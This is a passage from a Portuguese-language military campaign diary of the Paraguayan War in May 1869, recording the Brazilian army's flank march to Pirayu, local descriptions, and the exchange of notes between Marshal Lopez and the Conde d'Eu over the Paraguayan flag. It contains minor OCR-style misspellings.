os sete modelos mais aperfeiçoados daquele sistema, e também quais os espécimes novos que
foram por ela recebidos e examinados.

— Ao comandante do 2o Corpo de Exército foi
comunicado que, em alteração às disposições de 18 do corrente relativas à marcha, o 1o Batalhão de Artilharia
fique guarnecendo o ponto de Luque, determinando-se-lhe também que, de pois
de encetado o movimento sobre Pirayu, os trens brasileiros que seguirem a via férrea entre
Juquery e a cidade de Assunção levem consigo 10 praças de Infantaria, e 40 da mesma
arma se passarem aquela ponte com destino aos pontos ocupados para diante.

Da
primeira resolução ficou ciente o Sr. Coronel comandante da Brigada de
Artilharia, o qual tem de pôr às ordens do comando do 2° Corpo de Exército o batalhão daquela arma, que deverá guardar a estação de Luque, e a
porção
de linha férrea até a ponte de lbiray, junto a Vila de Trindade.

— A coluna do General |oão Manoel Menna Barreto pela
madrugada efetuou seu movimento para S. Lourenço, levando instruções que lhe
recomendam a comunicação constante com o Comandante-em-Chefe por meio de
oficiais de confiança que sejam, de todos os pontos importantes,
despachados com ofícios relatando os sucessos que se forem dando em sua
progressão.

Sua
Alteza, tendo logo após partido naquela direção com seu Estado-maior, notou que a
cauda formada pela grande quantidade de bagagens e cargueiros ocupava a enorme
extensão
de légua
e meia e oficiou a tal respeito ao chefe da expedição lembrando-lhe
da necessidade de oostar tal inconveniente em marchas feitas sobretudo por
caminhos estreitos e cortados de matos que favorecem os ataques do inimigo, e
chamando principalmente a sua atenção para as munições, cujo lugar mais conveniente fora no centro da
coluna entre as duas brigada? de infantaria.

— A Esquadra comunicou que ontem chegara o vapor Paysandu
trazendo cavalos recebidos na Tranqueira do Loreto e artilharia em Humaitá. Vem por ela noticia de ter chegado a seu destino
o reforço que de Luque partira a coluna de
Aguapehy

Sexta-feira, 21

Sua
Alteza, tendo ido pela manhã visitarão Sr. General Mitre, declarou-lhe a sua intenção de marchar no
dia seguinte, levantando acampamento apesar da muita chuva que não amainara havia
mais de quatro dias, e recebeu em resposta comunicação de que era por
ora impossível ao Exército argentino acompanhar este movimento que não fora acreditado tão próximo. Fazendo-se prestes, porém, e sobretudo
cuidando com rapidez na reunião dos meios de transporte, prometeu aquele general
dentro de cinco a seis dias adiantar-se até Patino-cuê, do que daria aviso com 24 horas de antecedência.

Depois
ficou assinado um acordo, redigido pelo Cônsul do Brasil e regularizando, por meio de multas e
medidas policiais, a exportação e importação de mercadorias no Porto de Assunção.

— Sua Alteza foi em seguida à cidade de Assunção combinar com o
General Henrique Castro sobre a marcha e obteve dele a mesma declaração que a do
General E. Mitre; saindo depois a passeio, visitou as diversas repartições, o novo
hospital estabelecido na casa que pertencera a Mine. Lynch, as
trincheiras etc, e, recolhendo-se ao Quartel-General, recebeu a visita do
comandante da canhoneira inglesa que vinha falar em favor de um cidadão daquela
nacionalidade, o qual obtivera do Marechal Caxias uma casa de que fora
posteriormente de-sempossado por decisão do tribunal encarregado de examinar a legalidade das
posses de propriedades.

A casa não tendo sido
ocupada, foi, em atenção ao pedido do comandante inglês, restituída sem que tal
favor constitua para o ocupante direito algum.

Sua Alteza
voltou às 5 horas da tarde para Luque e achou dois prisioneiros paraguaios que a
expedição do General João Manoel fizera.

Ao Cônsul brasileiro
em Assunção e presidente do tribunal internacional oficiou o Comandante-em-Chefe,
fazendo ver a conveniência que teria aquele tribunal, a vista do abandono de
Luque no dia seguinte.em mandar tomar conta das casas do povoado, ou, por
editais, convidar os proprietários das mesmas a vir ocupá-las quanto
antes.

O.General
Portinho comunicou com data de 9 do corrente, que às suas mãos haviam chegado
os ofícios
de 28 e 29 do mês próximo passado, nos quais se acham exaradas as instruções que o devem
reger-, além disso deu parte da chegada, a 4 do corrente, do Batalhão n° 12 de
Infantaria, de uma bateria de quatro canhões com a competente guarnição, e do
recebimento na Tranqueira do Loreto do fardamento e armamento pedido, tendo ido
logo carretas, cavalos e bois para transportá-los a ltapuá onde toda a Divisão deve
empreender a passagem do Paraná. Conforme o ordenado, cem cavalos seguiram no Paysandu
para Assunção, não tendo permitido a lotação do vapor embarque de maior porção.

 

 

— Ao governo imperial foi remetida a nota dos cavalos
recebidos desde o dia da chegada de Sua Alteza e distribuídos da maneira
seguinte:

Remetidos para o Rosário…………………………………. 390

Entregues
ao General Castro………………..
120

Ao piquete de Sua Alteza………………………………….. 30

A diversos oficiais……………………………………………. 87

Ao Io Regimento de Artilharia…………………….  
29

Ao 2o Regimento de Artilharia……………………. 20

A Ia Divisão de Cavalaria………………………………… 430

À 2a Divisão…………………………………………………….. 70

À 3a Divisão…………………………………………………… 397

À polícia …………………………………………………………. 40

Ao 10° Corpo de Cavalaria……………………………….. 40

Ao transporte…………………………………………………. 357

Ao piquete do General Polydoro………………….. 1 1

Ao Major Cespedes (paraguaio)…………………………..
1

Ao Capitão Saguier (paraguaio)…………………………… 3

A diversos empregados………………………………………. 3

Soma……………….. 2.028

Como
se vê,
o número
de cavalos recebidos não podia senão preencher as faltas mais sensíveis e de modo
algum constituir reserva para acudir de pronto às necessárias vagas da
cavalaria, um dos mais poderosos elementos na campanha. que vai ter começo.

Sábado, 22

O
dia amanheceu chuvoso, encoberto-, sem embargo, Sua Alteza, despedindo-se do comandante do 2° Corpo de Exército, saiu de Luque às sete e um
quarto de horas da manhã e às oito
atravessava a ponte de Juquery, que o Io Corpo, debaixo das
ordens do General José Luiz Menna Barreto, começara a transpor-, parando então em casa do
General Mitre, no seu novo acampamento, deixou que a tropa desfilasse toda e
depois de longa conferência, durante a qual discutiram-se ainda os melhores
meios de aprovisionamento para a força, seguiu em direção a Aregua

A
coluna ganhara distância, por isso Sua Alteza pôde devidamente
aprecia o grande peso que a bagagem dá a qualquer progressão: muitas carretas, mulheres, bagageiros, cargueiros, formam em verdade uma longa cauda que fica
pela mais insignificante circunstância sujeita à desordem e
confusão.

A
marcha do Exército foi na direção média de S.E.. Os caminhos eram ruins, resvalados,
cortados de sangas fundas que se tornavam, com a passagem das viaturas de
artilharia, em atoleiros de difícil trânsito. Por todos os lados porém, os aspectos do
terreno são muito agradáveis e variados, não só pelo viço da vegetação em geral, senão também pelos grupos vistosos de laranjeiras e limoeiros que
rodeiam as palhoças do lado direito da estrada. Da parte oriental
estendem-se, cobertos de plantas palustres, largos campos alagados, por meio
dos quais corre a linha de trilhos alteada em aterros consideráveis.

Às onze horas da manhã, acampou o Io Corpo de Exército na base do
Outeiro de Areguá e o Quartel-General foi ocupar as casas que formam
aquele pequeno povoado. Durante esse movimento, o 2° Corpo, às ordens do
Tenente-General Polydoroda Fonseca Quintanilha lordão, deixara a posição de Luquee
viera avançando até além do acampamento argentino.

Areguá é uma vila de pouca importância, bem que sua fundação date de
1538, época
em que, segundo Azara, contava perto de 200 habitantes da tribo guarani chamada
iMongolá. Hoje consta de três quarteirões ou casas unidas, como é de uso em todo o Paraguai, por uma varanda que é sustentada por colunas ou pilastras de tijolos.

A vista que daí se goza é em extremo aprazível. Do alto da
colina domina o olhar uma vasta planície salpicada de capões de mangues e coberta de juncos cujos topos lourejam
ao longe e uma grande parte da bonita Lagoa de Ipacaray ou Tapaicuan, de outro
lado da qual empina-se a cordilheira geral que, defronte de Areguá, tem o nome de
Altos. Apenas se levanta o terreno, começam a reaparecer as macaúbas"’ e matagais, de maneira
que nos primeiros planos de todo aquele grande painel agrupam-se eles, formando
graciosos maciços.

Em Areguá recebeu Sua Alteza uma carta do
General Mitre, prevenindo-o que fizera seguir à sua disposição o Regimento
argentino S. Martin e dois esqua drões da Legião paraguaia com a
bandeira dessa nacionalidade, força que foi fazer parte da vanguarda.

 

16  Estas palmeiras,
também
conhecidas sob a designação geral de "cocoteros", são os coqueiros
decatarro do Rio de Janeiro.

Em Areguá encontram-se
logo à
subida seixos rolados, brescias silicosas em terreno de época terciária, no qual
predomina argila corada por limonito. Há pedras de feldspato coloridas pelo oxido de ferro. A
falta de pedra de construção é geral em todo o Paraguai; pelo menos não há pedreira alguma
que seja aproveitada e nos terrenos não aparecem vestígios de rochas graníticas senão pelos lados do Apa. de maneira que todos os edifícios são feitos de
tijolos. Em Assunção aparecem só pedras na base das íortificações que se estão demolindo presentemente e que foram construídas em parte de
alvenaria, em parte de paredes de tijolos que encerram uma camada considerável de terra, à modo de taipa.

 

 

Enquanto se estabelecia
o acampamento em Areguá, uma coluna composta de um batalhão de infantaria, um Corpo de Cavalaria e duas
bocas-de-fogo, e dirigida pelo Coronel Manoel Cypriano de Moraes, ocupou a
ponte de Patino-cuê. com cuja guarda tiroteou a sua vanguarda. Ao mesmo
tempo partia o Tenente-Coronel Antônio Alves Pereira para ligar os movimentos da força do General João Manoel com as
do Corpo de Exército, tomando, pois, o caminho de Itauguá com destino a ltá; levou novas
indicações àquele general.

Domingo, 23

Às sete horas da manhã, debaixo de chuva que não abrandara, levantou-se
acampamento e com uma légua de marcha chegou-se a Patino-cuê, cuja estação tinha sido de
véspera
ocupada por gente nossa. As condições na viação foram as mesmas do dia anterior: a estrada era má e seguia ora
declives de algumas colinas ora atravessava várzeas em que se multiplicavam os
atoleiros. As perspectivas porém merecem ainda atenção-, as casinhas e roçados se
acham mais juntos, de modo que não raras vezes as
plantações de laranjeiras enfileiram-se ao longo do caminho

Em Patinocuê achava-se em construção a casa de campo de Mme. Lynch. Era um bonito edifício composto de dois espaçosos pavimentos, ambos ornados de
os-tentosa colunata, cujos intercolúnios deviam receber grades de ferro fundido e, o que
mais realce e valor lhe dava, rodeado de um magnifico pomar onde não só se encarreiravam
centenas de laranjeiras e limoeiros, mas também se viam os principais tipos da
pomologia européia, tais como macieiras, damasqueiros, pereiras etc.

Não é só esta notável habitação que dá beleza à localidade: a
estação
da estrada de ferro é bem construída como todas as outras e sobretudo muito elegante

Deixando à esquerda a casa
de campo que serviu, algumas horas depois, de quartel-general do 2° Corpo de Exército, seguiu uma
légua
além
o Io corpo, por estrada lançada sobre terrenos acidentados,
subidas e descidas de colinas que entre os dois pontos de Patinocuê e Itauguá se sucedem mais
próximas
umas das outras

17 Na marcha deste dia viam-se belos tipos de madeiras
paraguaijs-. o buirapuitan, o curupaí, – acácia angico – o ipê – tecoma especiosa – chamado pelos paraguaios euayri,
o irundei, além de diversas outras árvores.: notáveis como o tataré, o tarumá – vitex
montevidensis – muito comum em todo o Paraguai, o timbó-paulínia timbó, – o paio
borracho. – eriodentron samauna,- várias espécies de salgueiros nos terrenos encharcados, os ombús. urticaceas que
não
devem ser confundidas com o urnbu do Brasil – spondia venosa-que é uma burserácea. Com pouca
freqüência
aparecem as elegantes embaúbas-cecropia peltata.

 

Às dez horas e três quartos chegou-se a Itauguá que assenta na
encosta de um outeiro baixo, ao redor do
qual formou-se o acampamento.

Neste povoado, fundado
em 1728 e cujo número de habitações indicava
talvez uma população superior a 3.000 almas, viam-se algumas casas cômodas e ornadas
exteriormente com certo gosto arquitetônico. A igreja no alto e no centro de uma praça vasta é já bastante antiga
de construção, restaurada porém na fachada ou aumentada dela em tempos menos
remotos.

Consta
o frontispício de um corpo central cujo frontão é demasiado alto, flanqueado por dois apêndices de edificação mais nova e
que têm
em suas extremidades portas em arco para as varandas laterais. A torre é de pau, puxada
para a frente e ao lado esquerdo; verdadeiro mangrulho em que se
suspendem os sinos e que é coberto de zinco.

Em
toda zona percorrida existe grande abundância de roças abandonadas, de maneira que os nossos soldados iam
encontrando a granel mandiocas, aipins ou macaxeiras, abóboras, além de canaviais e
sobretudo profusão de laranjeiras que se distinguem pela doçura e beleza de
seus frutos.

As casas a
que pertenciam estas lavouras jaziam em ruínas, não só pelo desamparo já de alguns meses, como também pela pouca
solidez de sua construção, pois quase todas são cobertas de chamiça e feitas de
taipa metida entre paredes de pau a pique mal ripadas.

Segunda-feira, 24

O dia
amanheceu chuvoso e durante toda noite o tempo mantivera-se borrascoso. Não só por isso, mas
também
pelo cansaço que o estado do terreno tinha produzido na cavalhada e bestas de
bagagem e principalmente por faltas no fornecimento geral, Sua Alteza resolveu
ordenar uma falha.

Entretanto,
logo ao alvorecer, uma coluna composta da 8a Brigada de Infantaria,
um Corpo de Cavalaria e 10 bocas do Io Regimento de
Artilharia, foi, ao mando do Coronel Deodoro da Fonseca, varrer toda a porção de linha férrea até Patino-cuê e tomar de revés aquele ponto.
Essa força, sem encontrar resistência, cumpriu a comissão e chegou àquela ponte onde
achou a posição já deixada pelo inimigo e que constava de um princípio de trincheira
guarnecida de abatises e de uma corrente de ferro presa em dois postes. Assim
pois ficou, sem efusão de sangue, livre de obstáculos grande
parte da linha férrea em que avultam muitas pontes e pontilhões, bem como
foram reconhecidos os três passos do Arroio Pirayu mais próximos à ponta da Lagoa
de lpacaray, em que ele desemboca.

—  Sua Alteza, considerando que a distância a percorrer
pela coluna do General João Manoel desde Itá até Pirayu, passando pelo Jaguarão, era considerável e que os
caminhos, já por natureza maus, deveriam, com as últimas chuvas, ter ficado quase intransitáveis, determinou
chamá-la
para Itauguá, onde, de feito, sobre a tarde ela chegou. O General João Manoel
participou que de madrugada um corpo de brigada do Tenente-Coronel loão Sabino Menna
Barreto envolvera uma guarda de seis homens nas vizinhanças de laguarão, matando-lhe três homens e
aprisionando os outros três.

—  O dia foi sempre chuvoso até voltas do meio
dia: depois conservou-se enevoado, limpando mais ao descer da noite.

Terça-feira, 25

Por
entre espessa neblina e pela manhã começou a marcha: entretanto, pouco depois desfez-se a cerração, a atmosfera
tornou-se límpida e apareceu o Sol. Durante mais de légua a estrada segue os altos e
declives de colinas por entre matas que lhe ficam à direita e à esquerda,
formando desfiladeiros que apresentam possibilidade de grande defesa. O último e mais
importante deles é o denominado Guazuvirá, depois do qual abre-se uma larga
e descampada várzea, chamada o caixão do Pirayu – por ser ela encerrada entre montes e
cortada por aquela já importante corrente de água.

Enquanto a força movia-se pela estrada geral, o
seu flanco esquerdo, apresentado à zona ocupada pelos paraguaios,
era protegido pela coluna dos coronéis
Manoel Deodoro da Fonseca e Manoel
Cypriano de Moraes que iam seguindo a linha férrea.

O inimigo
presenciando da base da cordilheira, que pelo lado oriental fecha o vale de
Pirayu, as direções de nossas forças, tratou logo de incendiar um acampamento em que se
achava e que o Coronel Manoel Cypriano não pôde ir atacar com a necessária rapidez, por causa dos grandes
banhados que se interpunham, dando por isso tempo a que os homens que o
guameciam se atirassem para dentro dos matos que cobrem a encosta da serra.

Sem
oposição
foi, pois, às 2 horas da tarde ocupada a vila de Pirayu, avançando a coluna do
General loão Manoel a ganhar logo na estrada de ferro a ponte sita uma légua além e fronteira ao
acampamento de Cerro Leon, a qual foi, como todas as mais, encontrada intacta.

Pela
tarde, esse acampamento, na fralda da serrania, foi repentinamente atacado pelo
Coronel Manoel Cypriano que, surpreendendo a sua guarnição, matou-lhe trinta homens, entre esses um capitão, e fez
prisioneiros vinte outros, com prejuízo único de duas praças feridas, uma das quais, porém, tão gravemente que
faleceu durante o curativo.

Na estação de Pirayu
encontraram-se os restos de uma locomotiva, que fora completamente desmanchada
e cujas peças mais importantes ou tinham sido atiradas ao arroio ou transportadas
para as fundições que o ditador mantém nas suas montanhas.

Uma outra
quase completa e só com os êmbolos sacados e os freios arrancados achava-se na estação de Cerro Leon, suspensa dos trilhos por dois
macacos para mais facilmente ser destruída. Além desta máquina, existiam
seis vagões em bom estado, três dos quais foram mandados, por causa do comparecimento
do Regimento S. Martin, entregar ao General
Mitre, por serem despojos arrecadados por força unida das
duas nações, conforme o protocolo em apêndice ao Tratado da Tríplice Aliança.

Depois desta
última
marcha de três e meia léguas entre Itauguá e Pirayu, ficou terminado o movimento de flanco que
havia sido ordenado pela circular de 18 de maio aos comandantes de corpos de exército, movimento
cuja direção geral foi a S. E., no sentido do caminho de ferro e contornando a base
da cordilheira em que se refugiara o inimigo, ocupando nela as mais importantes
e acessíveis subidas.

Pirayu
fica fronteiro ao acampamento de Ascurra e em linha reta dele distará pouco menos de
duas léguas.
Uma extensa planície se interpõe a esses dois pontos, que ocupam aquele a fralda de um
outeiro encostado a serros baixos, este a base da cordilheira, ficando quase ao
meio desta distância o Arroio Pirayu que corre, bordado sempre de mato, na direção de N.N.O. e, como ficou dito, vai desaguar na
lagoa Ipacaray.

Aquela
corrente representa, pois, perfeitamente o thalweg deste bonito vale que
se prolonga desde a extremidade sul da lagoa até a Vila de Paraguary numa linha de
cinco léguas, fechada do lado oriental pela cordilheira geral, do ocidental por
um cordão de morros mais ou menos elevados. As porções centrais são encharcadas e
facilmente inundadas pelo transbordar do rio, cujos vestígios nas cheias
ficam depositados, impedindo outra vegetação que não a dos espinhos e salgueiros.

As partes
altas são revestidas de vegetação vistosa e a cordilheira é coberta desde o
topo até a,fralda de mato denso e de muito difícil passagem.

Quarta-feira, 26

 

De
madrugada, seguiu o Brigadeiro Vasco Alves Pereira, à frente de duas
brigadas de cavalaria, para ir tomar o ponto de Paraguary, a três e meia léguas de distância, onde existia
a estação terminal da estrada de ferro. Aí pôde aquele general atacar de súbito uma guarnição de mais de 50 homens, dos quais
41 ficaram prisioneiros e o resto
pereceu por preferirem, à imitação do capitão comandante, a morte a
entregarem-se.

Na estação foram encontrados 29 carros de
condução, três vagões de primeira classe, nove de segunda, três de terceira, um
de cargas com bordas, dois pequenos de aterro e seis de cargas ainda não
acabados. À meia légua para cá da estrada achava-se uma ponte de 40 palmos de
vão destruída pelo fogo, tendo sido outro
pontilhão inutilizado pela queima dos encontros. Difícil era, pois, a
vinda de todos esses carros para Pirayu; entretanto, a atividade e inteligência do Capitão de Engenheiros Jeronymo
de Moraes Jardim, que acompanhara a expedição, venceram perfeitamente
tais tropeços, e por meio de pontes volantes e mui ligeiras pôde todo o trem
vir se reunir ao já tomado na estação de Pirayu.

Enquanto se executava o movimento até Paraguary, Sua Alteza,
à uma hora 6a tarde, dirigiu um reconhecimento sobre a posição de Ascurra
a qual demora na entrada da principal estrada, que, pelo dorso da montanha,
segue para o interior do departamento da
Cordilheira. Uma brigada forte, pronta para entrar em ação e ao mando do
Coronel Deodoro da Fonseca, atravessou o Arroio Pirayu no passo fronteiro à
povoação, percorreu a vasta campina que além
se desenrola e às duas horas empenhou fogo de atiradores com o inimigo, o qual, abandonando um acampamento abaixo,
recolheu-se ao entrincheiramento que defende a boca do caminho da serra.
Vinte tiros de artilharia foram-se sacudidos
e, apesar de estarem assestadas bocas-de-fogo na trincheira, ficaram. sem
resposta.

A coluna sem mais
ocorrência voltou às seis horas da tarde a Pirayu, onde Sua Alteza, pela noite,
recebeu os prisioneiros feitos em Paraguary.

Quinta-feira,
27

Pela manhã, o General Mitre
veio visitar Sua Alteza e anunciou-lhe que o Exército argentino
acabava de sair do desfiladeiro de Guazuvirá e ganhara e planície
de Pirayu, onde ocupava posição para acampar. O Sr. Príncipe montou imediatamente
a cavalo e propôs àquele general ir examinar os lugares intermédios
até Taquaral, onde já se achava o 2° Corpo de Exército, convite que foi aceito indo os dois generais
pela linha de trilhos até aquele ponto, separando-se aí o

chefe argentino para cuidar no estabelecimento do seu
campo, no qual Sua Alteza parou, quando de volta para o seu Quartel-General.

Os
argentinos colocaram-se a três quartos de légua do Taquaral e a uma de Pirayu junto ao morro
chamado Peron, único de toda aquela extensão e ficaram de
guardar a parte da estrada de ferro que lhes demorava em frente e aos lados e
de vigiar um passo no Arroio Pirayu.

Sua Alteza
durante a conferência com o General Mitre, fez-lhe ver que os
engenheiros brasileiros pediam com instância o número dos trabalhadores que, para a conservação da estrada, a
administração argentina havia prometido por ocasião de recusar a fusão das duas empresas numa única.

O chefe
argentino respondeu que ordens já haviam sido neste sentido expedidas e que ele deixara
em Juquery, Areguá e Patino-cuê destacamentos para ficarem às ordens daqueles
engenheiros.

— A estrada de ferro entre Taquaral e Pirayu acha-se em
bom estado de conservação: assente toda ela em possantes dormentes, é em duplo T. e segura ainda mais por unhas de ferro que retêm coxins de madeira riquíssima.

Os fios
telegráficos
foram tirados: entretanto quase todos os postes haviam ficado, de modo que com
brevidade foi pelo hábil engenheiro Álvaro Joaquim de Oliveira corrida nova linha,
estabelecendo-se a imediata comunicação com a cidade de Assunção.

Sexta-feira, 28

Não houve ocorrência digna de nota.

Sábado, 29

Ao romper do
dia, uma brigada, sob as ordens do Coronel Deodoro da Fonseca, marchou em direção à posição de Cerro Leon,
à
cuja retaguarda há uma subida para vencer-se a cordilheira. Recebeu
contudo a coluna ordem para contramarchar, por isso que do lado de Ascurra
ouvia-se canhoneio prolongado, e dirigiu-se para aquele rumo, tendo Sua Alteza
se unido a ela. Depois de transposto o Pirayu, sobreveio chuva violenta e
cessou completamente o barulho, o que fez com que, retirando-se para seus
acampamentos os diversos batalhões, fosse só uma partida forte de cavalaria reconhecer qualquer
novidade que houvesse ocorrido nas posições inimigas.

Tendo cumprido a ordem,
retirava-se aquela força, quando o seu comandan te recebeu de um
parlamentário paraguaio duas cartas, uma dirigida pelo General Mac-Mahon
ao Sr. Worthington, Ministro dos Estados Unidos em Buenos Aires, e a

outra
pelo Marechal Lopez à Sua Alteza.

— O General Mitre mandou a
Pirayu, à noite, um seu ajudante-de-ordens participar que pela manhã
fora uma fração de seu exército reconhecer a posição de Ascurra,
provindo daí o canhoneio que por algum tempo se ouvira. Perdera um

homem
e voltara sem novidade.

A carta do General
Mac-Mahon foi logo encaminhada para seu destino, em Buenos Aires, por meio de endereço ao Sr. Conselheiro Paranhos.


A nota do Marechal Lopez era conhecida nos seguintes termos:

Cuartel
General, Maio 29 de 1869.

Hace
algun tiempo que los desertores y prisioneros dei ejercito aliado han venido
diciendo que en aquel campo se habia bendecido ia bandera nacional de la
republica dei Paraguay, yyo no quis creerlo.

Cuando supe que
V.A.l. habia assumido ei mando dei ejercito aliado, confiando en Ia hidalguia,
caballerosidad y noblesa de sentimientos, que no puedo menos que atribuir
á un príncipe que
tanto se deve a su nombre y al de su alianza. me tranquiiis
é sobre ei
uso que pudiera hacer-se de Ia bandera de Ia p
átria, que
tanta sangre generosa habia costado a sus leales hijos, y no me importe mas de
los desvarios que hubiesen dado lugar ai acto sacrilego de su bendicion, si tal
se hubiese praticado. Mas, esta manana h
á amanecido ai frente de mi
linea una descubierta de cuerpos de caballeria y infanteria dei ejercito
aliado, tremolando ia sagrada ense
íía de Ia pátria que V. A. I. combate.

La
profunda pena que como magistrado y como soldado me h
á causado
esto, ser
á fácil á V.
A. I. medir en
Ia honorabilidad de sus sentimientos.

Ahora
vengo
á rogará V.
A. I. quiera
tenerla dignacion de mandar entregar en mi linea, de aqui
á manana,
esa bandera, y prohibir que
en adelante
flameen los colores nacionales en Ias filas de su mando, ya que ni siquiera los
desgraciados

prisioneros nunca fueron respetados.

Prestando-se V. A. 1. a esta solicitud. como lo
espero, habr
á mantenido ei lustre de su dinastia y prestado gran servido á la
humanidad, pues me relevar
á de Ia dura e repugnante necessidad de tener que hacer
efectiva Ia condicion estabelecida para este caso en nota de 20 de Noviembro de
1865 ai Exm. Sr. brigadier general D.

Sartolomeo Mitre, presidente de Ia republica Argentina
y predecessor de
V. A. I. en el zommando en gefe
dei ejercito aliado, que en ei de Ia republica tiene un considerable numero de
prisioneros.

Tengo ei
honor de saludar
á V.
A. I. com mi
consideracion muy distingui da.
Francisco
S. Lopez. -A S. A.
I. ei conde d’Eu, general en gefe de ejercito aliado, ale. etc, etc.

Sua Alteza respondeu da maneira seguinte:

Comando-em-Chefe
de todas as forças brasileiras em operações na República do
Paraguai, Quartel-General em Pirayu, 29 de maio de 1869.

O
abaixo-assinado, Comandante-em-Chefe de todas as forças brasileiras em
operações
na República
do Paraguai, recebeu a nota que lhe dirigiu em data de hoje o Marechal
Francisco Solano Lopez, Nesta nota manifesta este que já faz algum tempo
que os desertores e prisioneiros do exército aliado têm dito haver-se benzido no acampamento aliado a
bandeira nacional da República do Paraguai, e que não quis acreditá-lo; mas que hoje
de manhã apareceu na frente de sua linha -ma descoberta de corpos de cavalaria e
infantaria do exército aliado, tremulando nela a insígnia da nação paraguaia.

Acrescenta o
Sr. Marechal Lopez, que tendo-lhe causado esse fato profunda pena como
magistrado e como soldado, roga ao abaixo-assinado que mande entregar na sua
linha, até amanhã, esta bandeira, e proibir que de ora em diante flamejam
as cores paraguaias nas fileiras ao mando do abaixo-assinado, já que nem sequer
os desgraçados prisioneiros foram nunca respeitados.

Conclui
dizendo que, prestando-se o abaixo-assinado a este pedido, como espera o
Marechal Lopez, terá prestado um grande serviço à humanidade, pois dispensará este da dura e
repugnante necessidade de fazer efetiva a condição estabelecida na nota de 20 de
novembro de 1865, endereçada ao Exmo. Sr. General D. Bartholomeu Mitre, então presidente da
República
Argentina e Comandante-em-Chefe dos exércitos aliados, os quais, diz o Sr. Marechal Lopez, têm grande "úmero de
prisioneiros no da República do Paraguai.

O
abaixo-assinado não tem presente a referida nota de 20 de novembro de
1865; embora, porém, a tivesse, não lhe seria possível dar com a brevidade exigida solução à nota a que ora
responde, pois em virtude das estipulações que vigoram entre as nações aliadas, não é ele
General-em-Chefe dos exércitos aliados, como supõe o Sr. Marechal Lopez, e para
qualquer deliberação carece pôr-se de acordo com
os comandantes das forças argentinas e orientais, aos quais, assim como a:
Governo Imperial dá nesta data conhecimento da nota do Marechal Lopez.

Limitar-se-á, por ora, a
fazer observar que o aparecimento da bandeira paraguaia nas fileiras aliadas
tem sua explicação no fato publicamente mencionado em numerosos
documentos oficiais, de que a presente guerra nunca teve fins hostis a existência da
nacionalidade paraguaia, e que considerável número de paraguaios têm-se manifestado desejosos de cooperar com as forças aliadas s
pacificação de sua pátria.

O
abaixo-assinado também não pode deixar sem reparo a alegação feita pelo
Marechal Lopez de que os desgraçados prisioneiros nunca foram respeitados. A humanidade
com que os prisioneiros paraguaios, quer feridos, quer sãos, têm sido
invariavelmente tratados pelos aliados, gozando hoje em dia a maior parte deles
de plena liberdade, contrasta com as crueldades exercidas nos súditos das nações aliadas, os
quais tiveram a infelicidade de cair no poder do Marechal Lopez, e que aos
centenares têm sofrido diferentes gêneros de morte, como consta não só das declarações dos que
escaparam, como dos próprios documentos oficiais paraguaio;

Ao concluir,
o abaixo-assinado chama sobre o Sr. Marechal Lopez a inteira responsabilidade
de qualquer aumento de maus-tratos com que porventura este julgue dever agravar
a sorte dos prisioneiros de guerra, sob o pretexto mencionado na nota que ora
fica respondida. – Gastão de Orleans, Conde
d’Eu.

Domingo, 30

O
comandante do 2o Corpo de Exército fez chegar ao conhecimento de sua Alteza alguns
sucessos de que dá parte o Brigadeiro José Antônio Corrêa da Câmara, o qual já se achava na
zona em que vai operar. Comunica este general que embarcara no dia à tarde com o
Batalhão
de Infantaria n° 23, ficando os corpos II 19 e 21 de
Cavalaria de Guardas Nacionais e 2 bocas-de-fogo por saírem do Porto: de
Assunção.
No dia 19, passou pela foz do Manduvirá e às seis horas desse mesmo dia alcançou a embocadura
do Rio Cuarepoty, em cuja margem esquerda esta situada a Vila do Rosário,
presentemente fortificada por nossa gente.

No seguinte (20) deu ordem para seguirem em direção aos portos de Cuaretos e do Paraguai um Corpo de Cavalaria, um Batalhão de Infantaria e
4 bocas-de-fogo com todo o seu material.
Nesse dia chegaram os Corpos nº 11,18 e 19 de Cavalaria 11 e 23 de
Infantaria e duas bocas-de-fogo. Todas essas forças embarcaram com alguma
dificuldade nos navios encouraçados Bahia, Silvadoeno Itapicurue subiram

o Rio Paraguai até o lugar chamado Potrero-ponan, extenso vale alagado,
como são
todos os arredores da foz do Jejuy.18 Entretanto, até as 6 horas da
tarde do dia 20, tinha-se completado o desembarque, procedendo-se a imediatas
descobertas não só do terreno em que se ia acampar como das estradas que

vinham ter,

Voltaram
então
para o Rosário os transportes Annícota, Tigree Itapicuru,
os encouraçados e um monitor para trazerem forças e material que
tivessem ficado em diversos pontos e que deviam a 22 estar reunidos em
Potrero-ponan para empreender-se a marcha sobre a Vila de S. Pedro.

Em conseqüência, a 21,
ordem foi dada ao Coronel João da Silva Tavares para proceder com 600 homens bem
montados, a um reconhecimento dos lugares que medeiam até a vila e que os
vaqueiros diziam serem completamente intransitáveis e ínvios. Essa operação devia ser
feita com grande rapidez, por isso que o inimigo tem a costa do rio
completamente devassa por numerosos espiões e destacamentos.

Às 10 horas da noite voltou o Coronel Silva Tavares e
comunicou que, depois de vencer grande distância e de marchar por mais de duas léguas e meia em
extenso banhado cujo fundo era bastante atoladiço, conseguira cair sobre a força que havia em S. Pedro, a
qual, contudo, em seus quartéis opôs tenaz resistência, de onde resultou a morte de cinco homens, entre eles o Tenente Melgarejo, sendo
ferido gravemente o Capitão Aleixo Gomes, que ficou prisioneiro com mais 12
homens.

O
General Câmara, considerando que a viação pelos lodaçais por que transitara o Coronel Tavares era impossível a toda a
coluna, deu ordem aos transportes que vinham do Rosário para que
desembarcassem tão-somente a cavalaria no Potrero-ponan e subissem o Rio
Jejuy até onde lhes fosse possível.

No
dia 23, seguiu a cavalaria com dois corpos de infantaria e pessoal de
artilharia em direção à vila e, depois de 7 1/2 léguas de marcha
por terrenos inundados que formavam um grande pantanal quase insuperável, chegou
aquele ponto1”, aprisionando antes de entrar nele uma pequena
guarda que se julgava em salvo pelas dificuldades que a rodeavam.

Tal era com
efeito a natureza ingrata daquelas paragens, o aguaçal contínuo, o pouco
conhecimento dos passos e o arrojo da empresa, que aqueles homens surpresos
confessaram nunca poder supor a vinda de brasileiros por aí. Duas e meia léguas
sobretudo foram tão difíceis de vencer, que o comandante da expedição, para tornar
conhecidos os embaraços com que ‘utou, lembra a marcha pelo Chaco, sem contudo
equiparar aquela com esta outra, tão mais atribulada e fadigosa foi.

 

18  Nasce o jejuy na Serra de Urucuty. corre de E. 3 O. e desemboca no
Paraguai na latitude de 24" 12′,depois de atravessar
vastos Yerbales e perto da foz. terrenos apaulados. ‘"Vila de São Pedro ou
Ycamandiú acha-se a S. S. O. de Potrero-ponan e a pequena distância da margem direita do Rio Jejuy.

 

Até o dia 23 a nossa
coluna ficava na Vila de S. Pedro, onde lá chegara a canhoneira
